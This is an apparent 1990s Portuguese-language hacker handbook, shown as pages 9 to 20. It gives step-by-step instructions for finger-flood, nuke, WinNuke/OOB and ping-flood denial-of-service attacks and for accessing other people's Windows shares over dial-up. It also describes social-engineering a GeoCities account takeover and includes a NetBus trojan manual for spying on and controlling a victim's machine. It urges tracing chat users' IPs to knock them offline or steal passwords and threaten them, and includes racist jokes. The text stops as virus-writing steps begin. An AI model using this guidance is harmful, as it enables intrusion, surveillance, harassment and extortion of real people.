  • 9. FINGER DoS OS QUE ESTÃO RODANDO FINGER UNPATCHEADO PARA QUEM NÃO SABE, FINGER É UM SERVIÇO MUITO PRESENTE EM SISTEMA MULTIUSUÁRIO (ESPECIALMENTE SISTEMAS UNIX) QUE MOSTRA QUEM ESTÁ LOGADO NO SISTEMA, SEUS LOGINS, TERMINAIS QUE ESTÃO UTILIZANDO, TEMPO QUE ESTÃO LOGADOS, ETC. É BEM ÚTIL NA OBTENÇÃO DE INFORMAÇÃO PARA UMA HACKEADA, MAS NÃO É DISSO QUE ESTAMOS FALANDO AGORA. O FINGER OPERA NA PORTA 79 E FUNCIONA NO ESQUEMA REQUEST-ANSWER. ASSIM, VOCÊ FAZ UM FINGER REQUEST PARA O FINGERD DE UM HOST E ESTE HOST TE RESPONDE, DE ACORDO COM A REQUEST QUE FOI FEITA. SE VOCÊ QUISER SABER QUEM ESTÁ LOGADO NO SISTEMA VOCÊ DÁ O COMANDO FINGER@SISTEMA .COM.BR E LOGO VERÁ UMA LISTA DE USUÁRIOS LOGADOS. SE QUISER SABER INFORMAÇÕES SOBRE UM DETERMINADO USUÁRIO VOCÊ DÁ O COMANDO FINGER USUÁRIO@SISTEMA.COM.BR. O ATAQUE CONSITE EM VÁRIOS REQUESTS ENVIADOS RAPIDAMENTE PARA O ALVO. USUÁRIO@@@@@@@@@@SISTEMA.COM.BR. CADA @ QUE VOCÊ COLOCOU REPRESENTA UM REQUEST E LOGO ASSIM, O COMPUTADOR DA VÍTIMA SOFRERÁ UM FLOOD DE REQUESTS, O QUE DIMINUIRÁ O DESEMPENHO. (NUNCA SOUBE DE NENHUM TRAVAMENTO OCASIONADO POR ESTE ATAQUE). ENTÃO É SEGUINTE MANO! SE VOCÊ TEM NEURÔNIOS O SUFICIENTE EM SEU CÉREBRO PERCEBEU QUE O WIN 95 E NT SÃO AS VÍTIMAS DE QUASE TODOS OS ATAQUES LISTADOS AQUI. E NÃO PENSE QUE ESSES SÃO TODOS, POIS EXISTEM MUITOS OUTROS QUE ESTÃO SENDO CRIADOS NO MOMENTO. DoS É AGORA, COMO JÁ MENCIONEI ANTES, UM CAMPO A 9
  • 10. SER EXPLORADO PELOS HACKERS. SNIFFER O SEGUINTE DOCUMENTO VISA AUXILIAR ADMINISTRADORES A COMPREENDER PROBLEMAS RELACIONADOS COM SNIFFING E AS POSSÍVEIS SOLUÇÕES. A AÇÃO DOS SNIFFERS É ATUALMENTE UM DOS PRINCIPAIS PROBLEMAS DE SEGURANÇA. O QUE É O SNIFFER E COMO ELE FUNCIONA? COMPUTADORES EM REDE COMPARTILHAM CANAIS DE COMUNICAÇÃO. ISSO É OBVIAMENTE MUITO MAIS BARATO DO QUE PASSAR UM CABO EM CADA PAR DE COMPUTADORES PARA FAZER AS CONEXÕES. NESTES CANAIS COMPARTILHADOS, COMPUTADORES PODEM RECEBER INFORMAÇÕES ENVIADAS A OUTROS COMPUTADORES. A AÇÃO DE CAPTURAR INFORMAÇÕES DESTINADAS A OUTROS COMPUTADORES É CHAMADA SNIFFING. O PADRÃO ETHERNET ENVIA UM PACOTE PARA TODAS AS MÁQUINAS EM UM MESMO SEGMENTO. O CABEÇALHO DO PACOTE CONTÉM O ENDEREÇO DA MÁQUINA DESTINO. SUPÕEM-SE QUE SOMENTE A MÁQUINA QUE TENHA O ENDEREÇO CONTIDO NO PACOTE RECEBA-O. DIZ-SE QUE UM COMPUTADOR ESTÁ EM MODO PROMÍSTUO QUANDO O MESMO CAPTURA TODOS OS PACOTES, INDEPENDENTEMENTE DE SEREM OU NÃO DESTINADOS A ELE. EM UM AMBIENTE DE REDE NORMAL, OS NOMES E AS SENHAS DOS USUÁRIOS SÃO PASSADAS ATRAVÉS DA REDE EM CLARO, OU SEJA, TEXTO NÃO CRIPTOGRAFADO. NÃO É DIFÍCIL, PORTANTO, UM INTRUSO UTILIZANDO UMA MÁQUINA COM INTERFACE DE REDE EM MODO PROMÍSTUO, OBTER QUALQUER SENHA, INCLUSIVE A DO ROOT, UTILIZANDO UM SNIFFER. DICAS DE ÉTICA HACKER DESCOBRIU ALGO NOVO, OLHE. NÃO APAGUE. PENSE NO QUE SERIA MELHOR: TER ACESSO A PROVEDOR OU DETONÁ-LO? 10
  • 11. NÃO MODIFIQUE NADA, A MENOS QUE QUER QUE SAIBAM QUE ESTEVE LÁ. NUNCA TENTE UM SU ROOT DIRETO. ISSO FICA LOGADO. NÃO FIQUE USANDO TELNET OU PEGANDO E-MAIL USANDO ACESSO DOS OUTROS. NUNCA SUBESTIME UM SYSOP. ESCOLHA HORAS ENTRE 0:30 E 6:00. UMA VEZ LÁ DENTRO TENTE DOMINAR O LUGAR, MAS COM CAUTELA. NÃO COFIE EM NINGUÉM. SE PEGAR A SENHA DO ROOT DE UM PROVEDOR DE ACESSO E NÃO SABE O QUE FAZER, MATE-SE! NÃO TESTE VÍRUS NO PRÓPRIO HD. É BOM PREPARAR MUITO BEM UM A ESTRATÉGIA ANTES DE ATACAR. USE OS COMPUTADORES DE SUA UNIVERSIDADE (É MAIS SEGURO) NÃO FIQUE DISTRIBUINDO INFORMAÇÕES SOBRE O QUE VOCÊ PEGOU. NÃO TENHA PENA DE NINGUÉM. VOCÊ USA MS-DOS, LINUX, WINDOWS OU UNIX? NÃO CONTE A NINGUÉM... NÃO CRIE LAÇOS AFETIVOS COM A VÍTIMA. APRENDA O MÁXIMO QUE PUDER COM QUEM SABE MAIS! NÃO SE META A BESTA DIRETO! MAIS DICAS CONHEÇA A FUNDO OS SOSTEMAS OPERACIONAIS COMO O WINDOWS, LINUX E UNIX, WINDOWS NT. COM ELES É QUE VOCÊ IRÁ ENTENDER COMO QUEBRAR A SEGURANÇA OU ENTÃO COMO FUNCIONA A SEGURANÇA, É MAIS DIFÍCIL, MAIS NÃO IMPOSSÍVEL. APRENDA UMA LINGUAGEM DE PROGRAMAÇÃO COMO VISUAL BASIC OU C. VOCÊ ESCREVENDO PEQUENOS PROGRAMINHAS PODE DEIXAR UM PROGRAMA RODANDO EM PARALELO PARA DESCOBRIR SENHAS DE ACESSO. APRENDA A USAR O COMANDO TELNET DO UNIX PARA SE LOGAR EM MÁQUINAS REMOTAMENTE E COPIAR AQUELE PROGRAMA OCULTO QUE FALTA PARA VOCÊ ENTRAR 11
  • 12. NOO SISTEMA OU ENTÃO CADASTRAR UM USUÁRIO FANTASMA PARA ENTRAR NO SITEMA. APRENDA COMO FUNCIONAM AS REDES E QUAIS OS TIPOS DE REDES QUE EXISTEM. HOJE EM DIA, A MAIORIA DOS COMPUTADORES ESTÃO INTERLIGADOS E VOCÊ CONHECENDO A ARQUITETURA E PROTOCOLOS USADOS FACILITA BASTANTE O ACESSO. APRENDA O PROTOCOLO TCP/IP, QUE É USADO HOJE EM DIA NA INTERNET. ISSO SE VOCÊ QUISER SER UM HACKER DA NET. DIAL UP DEVIDO A UMA ENORME QUANTIDADE DE BUGS E UMA CAPACIDADE DE PROTEÇÃO QUE PERMITE QUE QUALQUER PESSOA INVADA UM MICRO QUE UTILIZE A REDE DIAL UP, COM UMA CONEXÃO PPP, O WINDOWS É UM DOS MAIORES MOTIVOS DE PIADAS ENTRE OS PORTUGUESES, NEGROS E O RUBINHO BARRICHELO. MESMO QUE VOCÊ NÃO ESTEJA UTILIZANDO O COMPARTILHAMENTO DE ARQUIVOS, QUALQUER PESSOA PODE INVADIR SEU COMPUTADOR SE VOCÊ ESTIVER FAZENDO ESTE TIPO DE CONEXÃO. PARA ESTA "RECEITA DE BOLO" FUNCIONAR, VOCÊ TEM QUE ESTAR USANDO A REDE DIAL UP E UMA CONEXÃO PPP. ANTES DE TUDO VERIFIQUE SE VOCÊ POSSUI OS DRIVERS CLIENTES DA MICROSOFT. CASO NÃO ESTEJA, INSTALE-OS ATRAVÉS DO PAINEL DE CONTROLE NO ÍCONE REDE. VERIFIQUE TAMBÉM, SE O COMPARTILHAMENTO DE ARQUIVOS E IMPRESSORAS ESTÁ INSTALADO. CONFIGURAR ESTAS OPÇÕES É SIMPLES. VÁ AO PAINEL DE CONTROLE E ABRA REDE. VERIFIQUE AS PROPRIEDADES DO TCP/IP. ALPI VOCÊ ENCONTRARÁ A OPÇÃO PARA ATIVAR A RESOLUÇÃO WINS. NO CASO DE VOCÊ NÃO CONHECER NENHUM SERVIDOR WINS, 204.118.34.6 COMO PRIMÁRIO E 204.118.34.11 COMO SECUNDÁRIO. ESSES SERVIDORES SÃO SO USA E GRATUÍTOS. CASO QUEIRA OUTROS ENDEREÇOS, UTILIZE UM DOS MECANISMOS DE BUSCA DA INTERNET. PARA CONFIGURAR O LMHOSTS VOCÊ PRECISA CRIAR UM ARQUIVO TEXTO SIMPLES, COM O NOME DE LMHOSTS. NESSE ARQUIVO É ONDE FICARÃO OS ENDEREÇOS DE IP E OS NOMES DOS COMPTADORES ACESSADOS. PARA LOCALIZAR DETERMINADO COMPUTADOR VOCÊ DIGITA O SEU NÚMERO DE IP E A SEGUIR SEU NETBIOS, NA MESMA LINHA, ESPARADO POR UM ESPAÇO. SE VOCÊ EXECUTAR O PROGRAMA NBTSTAT –N, TERÁ A LISTA, COM O NOME E O IP DE SEU COMPUTADOR, SEMPRE SENDO O PRIMEIRO DA LISTA, SEGUIDO DAS OUTRAS MÁQUINAS DISPONÍVEIS,TUDO NUMA JANELA DO DOS. ATRAVÉS DO EXPLORER VOCÊ PODERÁ VER OS 12
  • 13. COMPUTADORES DISPONÍVEIS NA REDE DOS QUAIS VOCÊ AINDA PODERÁ UTILIZAR OS DISCOS MAPEANDO-OS, O QUE OS TORNARÁ UNIDADES DE SEU COMPUTADOR. COMO HACKEAR UMA PÁGINA DA GEOCITES? É A COISA MAIS FÁCIL DO MUNDO... ENTREI NA PÁGINA DE VÁRIAS PESSOAS E PENSEI PORQUE ATÉ HOJE NÃO OUVI FALAR DE NINGUÉM QUE TENHA HACKEADO UMA PÁGINA DA GEOCITES. VAMOS DIRETO AO ASSUNTO: ANOTE O MEMBER NAME DA PÁGINA DANDO UM SOUCE. ANOTE O LUGAR QUE ESTA PÁGINA ESTÁ, POR EXEMPLO: http://www.geocites.com/AUGUSTA/2000. LOGICAMENTE VOCÊ SÓ VAI ANOTAR O DIRETÓRIO E O BLOCK. AGORA VÁ ATÉ A PÁGINA PRINCIPAL DA GEOCITES E CLIQUE NO LINK CONTACT GEOCITES, DEPOIS CLIQUE EM SYSTEM PROBLEMS, E DEPOIS EM SYSTEM PROBLEMS REPORTING FORM. LÁ VOCÊ VAI COLOCAR AS INFORMAÇÕES NECESSÁRIAS, O DIRETÓRIO, ACIMA CITADO, O BLOCK (ACONSELHO FAZER FOWARD) E NO ESPAÇO ABAIXO VOCÊ VAI COLOCAR OPROBLEMA. DIGA QUE AINDA NÃO RECEBEU SUA SENHA, EM INGLÊS: "EXCUSE ME FOR THE UP SET, BUT I DIDN’T RECEIVE MY SIGNAL". PORRA! COMO É RIDÍCULO NÉ? AGORA É SÓ ESPERAR 3 OU 4 DIAS NO MÁXIMO QUE VOCÊ RECEBE SUA SENHA! ASTREANDO IP PELO MS-DOS TODO MUNDO TEM O MS-DOS INSTALADO EM SEU COMPUTADOR, POR ISSO, QUASE NINGUÉM SABE QUE TEM UM POTENTE RASTREADOR E IP EM SUA MÁQUINA. MAS ANTES DE TUDO, O QUE É UM ENDEREÇO IP? ENDEREÇO IP É UM NÚMERO QUE VOCÊ RECEBE QUANDO SE CONECTA A UM SERVIDOR. UM EXEMPLODE SERVIDOR DE IP É 200.200.200.200. OS TRÊS PRIMEIROS NÚMEROS REPRESENTAM O DNS DE SEU SERVIDOR, E O ÚLTIMO NÚMERO QUE VARIA. NO BRASIL, 13
  • 14. TODOS OS IP’S COMEÇAM COM 200. PARA RASTREAR, VOCÊ DEVE USAR UM PROGRAMA CHAMADO ARP, PRESENTE NO DOS. O COMANDO QUE DEVE SER DIGITADO É ARP -A. VOCÊ TERÁ UMA LISTA DE ENDEREÇOS DE IP. MAS COMO SABER QUAL É O DA PESSOA?? VOCÊ DEVE TER CERTEZA QUE A ÚLTIMA INFORMAÇÃO QUE CHEGOU NO SEU MODEM VEIO DA PESSOA QUE VOCÊ QUER SABER O IP. E DAÍ ENTRAR COM O COMANDO NO MS-DOS. O IP DA PESSOA SERÁ O PRIMEIRO. TAMBÉM EXESTEM OUTROS PROGRAMAS COMO O NETSTAT. COM ELE VOCÊ PODE RASTREAR QUAL É O SERVODOR DA PESSOA E OUTROS. MAS ESSE PROGRAMA É COMPLICADO E VOCÊ QUER SABER COMO USÁ-LO DIGITE NETSTAT –H, E A TELA DE AJUDA APARECE. O QUE FAZER COM O ENDERÇO DE IP? VOC~E PODE NUKAR A PESSOA. O NUKE É IUM PROGRAMA QUE ENVIA UMA MENSAGEM DE ERRO PELA PORTA 139, FAZENDO A CONEXÃO DA VÍTIMA CAIR. VOCÊ TAMBÉM PODE INVADIR O COMPUTADOR DA VÍTIMA USANDO O BACK ORIFICE OU OUTRO PROGRAMA. MANUAL DO NETBUS HOST NAME/IP- COLOQUE O IP DA VÍTIMA. PORT- COLOQUE 12345 CASO JÁ NÃO HAJA UMA SELECIONADA. IN INTERVAL, FUNCTION DELAY, MEMO E ABOUT- DEIXE COMO ESTÁ. ADD IP- CASO O IP SEJA FIXO, ADICIONE ELE EM UMA LISTA. DEL IP- DELETE O IP ADICIONADO ANTERIORMENTE. CONNECT- ESTE É O BÁSICO, APÓS TER COLOCADO O IP DA COBAIA, SE CONECTE. SCAN- SCANEIA IP COM O PATCHE. SERVER ADMIN- MUDA AS CONFIGURAÇÕES DO NET BUS DA COBAIA. POSSUI ATÉ A OPÇÃO REMOVE A SERVER, OU SEJA, REMOVE O PATCHE DO MICRO DELA. OPEN CD ROOM- ABRE E FECHA O CD ROOM DA VÍTIMA CONFORME VOCÊ CLIQUE. SHOW IMAGE- VOCÊ DIGITA A URL DE UMA FOTO E ELA IRÁ APARECER NO MICRO DA COBAIA. SWAP MOUSE- FAZ COM QUE OS BOTÕES DO MOUSE SE TROQUEM. START PROGRAM- EXECUTA UM PROGRAMA NO MICRO DA COBAIA. 14
  • 15. MSG MANAGER- POSSIBILITA A VOCÊ MANDAR MENSAGENS DE ERRO, EDITADAS POR VOCÊ. VOCÊ PODE DEIXAR QUE ELA RESPONDA, OU NÃO... SCREENDUMP- DARÁ UM PRINT SCREEEM, NA TELA DA COBAIA, SALVANDO A IMAGEM DA COBAIA NO SEU NETBUS. GET INFO- DARÁ INFORMAÇÕES DA PESSOA, POR QUAL ARQUIVO ELA ESTÁ INFECTADA, ETC. PORT REDIRECT- MUDA A PORTA PELA QUAL VOCÊ UTILIZA PARA CONECTAR, MUITO COMPLEXO, POIS EXEISTEM POUCAS, MELHOR DEIXAR COMO ESTÁ. PLAY SOUND- TOCARÁ UM SOM, QUE ESTÁ PRESENTE NO MICRO DA COBAIA. COLOQUE A LINHA DE COMANDO. EXIT WINDOWS- RESETAR A COBAIA, DESLIGAR DIRETO, VOCÊ ESCOLHE. SEND TEXT- SERVE PARA FALAR COM OUTROS INVASORES, CASO HAJA ALGUM. ACTIVE WNDS- VER AS JANELAS QUE ESTÃO ATIVAS NO PC DA VÍTIMA. VOCÊ PODE ATIVAR, FECHAR OU ABRIR QUALQUER JANELA. APP REDIRECT- BESTEIRA MOUSE POS- VOCÊ ESCOLHE UMA POSIÇÃO PARA O MOUSE DELA FICAR. A COBAIA VAI FICAR LOUCA... LISTEN- ESTA É UMA DAS MELHORES!! VOCÊ PODE VER O QUE A PESSOA ESCREVE E ESCREVER PARA ELA (HE, HE!). APROVEITE QUANDO A VÍTIMA ESTIVER FALANDO EM CANAL ABERTO, PARA QUEIMAR O FILME DELA COM FRASES CABULOSAS. SOUND SYSTEM- SERVE PARA CONTROLAR O SISTEMA DE SOM DA VÍTIMA. AUMENTE NO MÁXIMO E EXECUTE UMA FILE WAVE! SERVER SETUP- MUDA AS CONFIGURAÇÕES DO NET BUS DA PESSOA. CONTROL MOUSE- VOCÊ CONTROLA O MOUSE DA VÍTIMA. GO TO URL- COLOQUE UMA HOME PAGE QUE VOCÊ PREFERIR, OU ODIAR, PARA A COBAIA IR. KEY MANAGER- ESTA TAMBÉM É MUITO MASSA! VOCÊ PODE DESATIVAR TECLAS DO 15
  • 16. TECLADO DA PESSOA. É MELHOR DESATIVAR ALGUMAS TECLAS, PRINCIPALMENTE AS VOGAIS. FILE MANAGER- ESSA MATA A PAU!!!VOCÊ TERÁ ACESSO AO HD DA PESSOA E SUAS PARTIÇÕES! TUDO, TUDO SEU!!!!!! PODENDO FAZER DOWNLOAD, UPLOAD, O QUE QUISER! MAS LEMBRE-SE: ENTRE, OLHE, BRINQUE, MAIS JAMAIS APAGUE! O NUKE HÁ MUITA CONFUSÃO NO AR A RESPEITO DO NUKE, PRINCIPALMENTE DEPOIS DO SURGIMENTO DO WINNUKE. SURGIRAM PROTEÇÕES E DETETORES, E MUITA GENTE SE ESPANTA SOBRE O MOTIVO DE ELAS FUNCIONAREM EM ALGUNS CASOS E EM OUTROS NÃO. INFELIZMENTE, ESSA CONFUSÃO TEM ORIGEM MUITO SIMPLES: WINNUKE NÃO É NUKE! VAMOS ANALIZAR CADA UMA DAS DUAS TECNOLOGIAS COM PROFUNDIDADE SUFICIENTE PARA DESFAZER ESTE EQUÍVOCO. INICIALMENTE, APRESENTAREMOS UM TEXTO DE AUTORIA R. O QUE É NUKE? NUKE ÉO NEME ATRBUIDO A PROGRAMAS QUE FINALIZAM PREMATURAMENTE COM UMA CONEXÃO TCP ATRAVÉS DO ENVIO DE ICMP COM MENSAGENS DE ERRO. TAIS PACOTES PODEM SER DIRECIONADAS PARA O SERVIDOR, OU PARA O CLIENTE. TAIS PROGRAMAS TEM A FINALIDADE DE TERMINAR COM A CONEXÃO FAZENDO COM QUE O CLIENTE OU O SERVIDOR SEJAM ENGANADOS POR UMA MENSAGEM DE ERRO QUE NORMALMENTE INDICARIAM UM PROBLEMA DE CONEXÃO ENTRE OS DOIS. O EFEITO DE TAL PROGRAMA PARA A VÍTIMA É A DESCINEXÃO DO SEU SERVIDOR, GERALMENTE SEM EFEITOS COLATERAIS. NUN EXEMPLO PRÁTICO SERIA COMO SE VOCÊ FOSSE DESCONECTADO DO SERVIDOR DE IRC. HISTÓRICO ACREDIT QUE O PRIMEIRO PROGRAMA NUKE FOI O NUKE.C, PARA UNIX. SEU AUTOR SE CHAMAVA SATANIC MECHANIC. ESTE PROGRAMA ENVIAVA PACOTES ICMP COM MENSAGENS DE ERRO NA PORTA 23 DOSERVIDOR, FINALIZANDO ASSIM COM CONEXÕES TELNET. COM A CRIAÇÃO DE FIREWALLS, NUKES DIRECIONADOS AO SERVIDOR PASSARAM A 16
  • 17. NÃO SER MAIS EFICIENTES. PASSOU-SE ENTÃO A NUKAR O HOST DO CLIENTE, NO ENTANTO, O FATO DO CLIENTE NÃO POSSUIR UMA PORTA FIXA PARA FIXA PARA ESTABELECER CONEXÃO COM O SERVIDOR DIFICULTA A OPERAÇÃO. A SOLUÇÃO PARA ISSO FOI O DEESENVOLOVIMENTO DE PROGRAMAS QUE VARREM SEQUENCIALMENTE TODAS AS PORTAS DO CLIENTE AONDE PODE EXIXTIR UMA CONEXÃO (DE 1024 A 65535), BOMBARDEANDO ELAS COM MENSAGENS DE ERRO ATÉ QUE SE ENCONTRE A PORTA ONDE SE DEU A CONEXÃO COM O SERVIDOR. O NÚMERO DE PROGRAMAS NUKING PARA UNIX SUPERA EM MUITO OS EQUIVALENTES PARA WINDOWS, ALÉM DE GERALMENTE SEREM MUITO MAIS EFICIENTES DEVIDO AS LIMITAÇÕES DO WINSOCK. ALGUNS PROGRAMAS DE NUKING DESENVOLVIDOS PARA O WINSOCK 2.2 JÁ ESTÃO SENDO LANÇADOS, ESTES SIM MUITO MAIS PODEROSOS DO QUE OS SEUS ANTECESSORES PARA A PLATAFORMA MICROSOFT. ENTRE ESSES POSSO CITAR O CLICK4 QUE REALMENTE É MUITO MAIS PODEROSO. UM DOS PRIMEIROS PROGRAMAS NUKE PARA A PLATAFORMAWINDOWS, FOI O WNUKE. É UM APLICATIVO EM 16 BITS QUE UTILIZA OS RECURSOS DO TRUMPET WINSOCK PARA ENVIAR OS PACOTES. FORAM LANÇADAS DIVERSAS VERSÕES DESTE PROGRAMA, CADA UMA IMPLEMENTANDO MAIS RECURSOS COMO CONTROLE DO TIPO DE MENSAGEM ICMP ENVIADA E DELAY ENTRE O ENVIO DOS PACOTES, DE FORMA QUE O PROGRAMA PODERIA SER UTILIZADO POR PESSOAS QUE NÃO DISPÕE DE UMA CONEXÃO DE ALTA VELOCIDADE COM A INTERNET. COMO EU UTILIZO O NUKE? BASICAMENTE TODOS OS PROGRAMAS DE NUKE UTILIZAM O MESMO PRINCÍPIO: DEFINIR O ALVO DOS PACOTES; DEFINIR O HOST DO CLIENTE; DEFINIR O HOST DO SERVIDOR; DEFINIR AS PORTAS A SEREM NUKADAS NO CLIENTE; DEFINIR AS PRTAS A SEREM NUKADAS NO SERVIDOR; DEFINIR O INTERVALO ENTRE OS PACOTES ENVIADOS; UMA VEZ DETERMINADOS ESSES PARÂMETROS O PROGRAMA INICIA O ENVIO DE PACOTES DE ERRO. QUANTO MAIS RÁPIDA FOR A SUA CONEXÃO COM A INTERNET, MAIS RÁPIDO 17
  • 18. SERÁ O ENVIO DOS PACOTES, E MAIS RÁPIDO A VÍTIMA SERÁ ATINGIDA. NO LUGAR DA PORTA DO SERVIDOR, O MAIS ÓBVIO É COMEÇAR A VARREDURA A PARTIR DA PORTA 6667, QUE É A PORTA DEFALT PARA A MAIORIA DOS SERVIDORES DE IRC. O TIPO DE MENSAGEM DE ERRO ENVIADA PODE SER DETERMINADA PREFERENCIALMENTE PELO TIPO DE ALVO. SE O ALVO FOR UMA MÁQUINA UNIX, MENSAGENS DE HOST UNREACHABLE DEMONSTRAM MAIOR EFICIÊNCIA. NO CASO DE MÁQUINA WINDOWS, "PROTOCOL UNREACHEBLE" DEMONSTROU SE MAIS EFICIENTE. OOB: O BUG DA PORTA 139 DIVERSOS PROGRAMAS UTILIZAM ESSE BUG PARA TRAVAR SISTEMAS WINDOWS, GERANDO DoS ATRAVÉS DO ENVIO DE UM PACOTE OOB (OUT FO BAND) MARCADO COMO URGENTE PARA AS PORTAS ESPECÍFICAS, COMO POR EXEMPLO A PORTA 139. SISTEMAS WINDOWS NT SEM O HOTFIX. OOBFIX INSTALADO AINDA NÃO AFETADOS EM DUAS OUTRAS PORTAS. APESAR DE SEREM CHAMADOS DE NUKE, NA VERDADE ESSES PREGRAMAS TEM FUNCIONAMENTO TOTALMENTE DIFERENTE, ELES APENAS SE APROVEITAM DE UMA FALHA DO SISTEMA. CONFORME DESCRITO EM SEÇÕES ANTERIORES, O FUNCIONAMENTO DE PROGRAMAS NULE É DIFERENTE. OS EFEITOS DE UM PROGRAMA DE OOB SÃO FACILMENTE PERCEPTÍVEIS. TODO O SISTEMA DE REDE DO WINDOWS ENTRA EM PÂNICO E GERALMENTE É NECESSÁRIA A REINICIALIZAÇÃO DO SISTEMA PARA QUE A SITUAÇÃO SEJA NORMALIZADA. FELIZMENTE JÁ EXISTEM DIVERSOS PATCHES DISPONÍVEIS PARA RESOLVER ESTE PROBLEMA. PINGA BOOM INICIALMENTE VALE EXPLICAR QUE NÃO ESTAMOS FALANDE DE CTCP PING, E SIM DO PROGRAMA PING QUE VERIFICA SE UM ENDEREÇO DE IP EXISTE E ESTÁ ACESSÍVEL. O MAU USO INTENCIONADO DESTE PROGRAMA, A PARTIR DE UMA CONEXÃO RÁPIDA COM A REDE FAZ COM QUE A VÍTIMA CAIA NUM LAG QUE PROVAVELMENTE O LEVARÁ A DESCONEXÃO POR PING TIMEOUT, DEVIDO A QUANTIDADE DE PACOTES RECEBIDOS SUPERAR EM MUITO 18
  • 19. A CAPACIDADE DE ESSES MESMOS SEREM DESENVOLVIDOS. WINNUKE UM BUG DO SUBSISTEMA DE REDE DO UNIX 3.X,M 95 E NT PERMITE QUE USUÁRIOS EXTERNOS POSSAM DESATIVAR TOTALMENTE O SEU ACESSO À REDE, SIMPLESMENTE ENVIANDO INFORMAÇÕES MARCADAS COMO URGENTES A DETERMINADAS PORTAS DO SEU COMPUTADOR (SENDO QUE A MAIS USUAL É A 139). ESSE ATAQUE DE DoS DESABILTA TOTAÇMENTE A COMUNICAÇÃO TCP/IP DA SUA MÁQUINA RETORNANDO AO NORMAL APENAS APÓS O REBOOT DA SUA MÁQUINA. EXISTEM PROTEÇÕES DISPONÍVEIS QUE SIMPLESMENTE FECHAM A PORTA 139. ISSO NÃO É EFICENTE, POIS O ATAQUE OOB PODE SER EXECUTADO EM OUTRAS PORTAS MENOS USUAIS TAMBÉM. DA MESMA FORMA, OS DETETORES DE QUE SE DESTINAM A IDENTIFICAR A ORIGEM DOS ATAQUES DE OOB TAMBÉM NÃO TEM EFICIÊNCIA MÁXIMA PORQUE LIMITAM-SE A OUVIR A PORTA 139. ALÉM DISSO, ELES NÃO DEVERIAM CHAMAR-SE DETECTORES DE NUKE, UMA VEZ QUE O ATAQUE QUE ELES DETECTAM NÃO CONSTITUI UM NUKE CANÔNICO, MAS APENAS UM EXPLOIT DE UM BUG DO MICROSOFT WINSOCK. PEGANDO O IP DE ALGUÉM EM UMA SALA DE CHAT JÁ DEVE TER ACONTECIDO COM VOCÊ DE ESTAR EM UM CHAT DE WWW E ALGUÉM TE XINGAR. XINGAR NÃO RESOLVE, APENAS MANTÉM A BRIGA. MAS QUE TAL SE VINGAR COM UM POUCO MAIS DE CLASSE? SERIA UMA BOA HEIN? QUE TAL NUKAR O OTÁRIO OU ENTRAR EM NO SERVER DE IP DELE, PEGAR UM A SENHA E AMEAÇÁ-LO? ISSO SIM QUE É ESTILO! COM UM RASTREADOR DE IP E ALGUNS PROGRAMINHAS VOCÊ PODERÁ FODER LEGAL. PEGAR O IP DE ALGUÉM EM UMA SALA QUE NÃO ACEITE TAGS HTML É MAIS FÁCIL DO QUE PEGAR IP EM SALA QUE ACEITE TAGS DE HTML. O TRUQUE É SIMPLES: VÁ AO PROMPT DO MS DOS E DIGITE ARP –A. COM ISSO IRÁ APARECER UM MONTE DE IP’S. O PRIMEIRO IP É O SEU EO ÚLTIMO DA PESSOA QUE TE MANDOU A ÚLTIMA MENSAGEM. VAMOS SUPOR QUE O RICK TE MANDOU UMA MENSAGEM. DAÍ VOCÊ RESOLVE PEGAR O IP DELE, E VAI AO E DIGITA ARP –A. O ÚLTIMO IP DA LISTA É O IP DO RICK. PRONTO, AGORA VOCÊ JÁ TEM O IP PROMPT DO MSDOS DO CARA. É SÓ PEGAR UM PROGRAMA NUKE E DERRUBAR O OTÁRIO. 19
  • 20. OS VÍRUS OS VÍRUS PODEM SER CCATALOGADOS EM TRÊS CATEGORIAS BÁSICAS: VÍRUS DE BOOT: OS VÍRUS DE BOOT SÃO TRANSMITIDOS BASICAMENTE POR DISQUETES, COPIANDO-SE PARA O SERTOR BOOT (O GRUPO DE INSTRUÇÕES QUE O COMPUTADOR LÊ QUANDO É LIGADO). JÁ TIVERAM O SEU ALGE DA FAMA, MAS HOJE ESTÃO CADA VEZ MAIS RAROS. VÍRUS EXECUTÁVEIS: TAMBÉM CONHECIDOS COMO VÍRUS DE ARQUIVOS ESTES PROGRAMAS SE ANEXAM AO CÓDIGO EXECUTÁVEL DE OUTROS PROGRAMAS, PRINCIPALMENTE OS QUE TEM A TERMINAÇÃO .EXE OU .COM. QUANDO UM PROGRAMA INFECTADO É EXECUTADO, O VÍRUS VAI PARA A MEMÓRIA DO COMPUTADOR E LÁ INFECTA OUTROS PROGRAMAS, EXECUTADOS POSTERIORMENTE. VÍRUS DE MACRO: ESTES VÍRUS ATACAM ARQUIVOS DE GABARITOS (TEMPLATES) DO MICROSOFT OFFICE, PRINCIPALMENTE OS ARQUIVOS NORMAL .DOT. A PARTIR DESTA CONTAMINAÇÃO. TODO O DOCUMENTO CRIADO POSSUIRÁ VÍRUS DENTRO DELE, E ESTE É UMA RAZÃO PELA QUAL ESSA CATEGORIA DE VÍRUS PE A MAIS DIFUNDIDA ATUALMENTE. A OUTRA É A RAZÃO DE SER MUITO FÁCIL PROGRAMAR EM VBA DO QUE LINGUAGEM COMO ASSEMBLER OU C++ UTILIZADA PELOS PROGRAMADORES DE VÍRUS EXECUTÁVEIS. UMA BOA ESTRATÉGIA DE SEGURANÇA É MANTER A OPÇÃO DE PROTEÇÃO CONTRA VÍRUS HABILITADA NO WORD. ESTA OPÇÃO ESTÁ ABILITADA NO MENU FERRAMENTAS/OPÇÕES/GERAL/ATIVAR PROTEÇÃO CONRA VÍRUS DE MACRO. ASSIM, SEMPRE QUE ALGUM ARQUIVO COM MACROS FOR ABERTO, EXISTIRÁ UMA OPÇÃO DE DESABILIITAR O SEU CARREGAMENTO. FAZER VÍRUS AGORA VOCÊ APRENDERÁ COMO FAZER ALGUNS TIPOS DE VÍRUS "SIMPLES". VÍRUS MAIS COMPLEXOS, EXIGEM CONHECIMENTOS DE PROGRAMAÇÃO. EM PRIMEIRO LUGAR VOCÊ DEVE LOCALIZAR O ARQUIVO EDIT.COM NA PASTA C:WINDOWSCOMMAND. COM O ARQUIVO ENCONTRADO, COPIE –O PARA UM DISQUETE E ABRA-O. IRÁ APARECER UMA TELA AZUL. É UM EDITOR COM POUCOS RECURSOS. ENTÃO DIGITE: 20
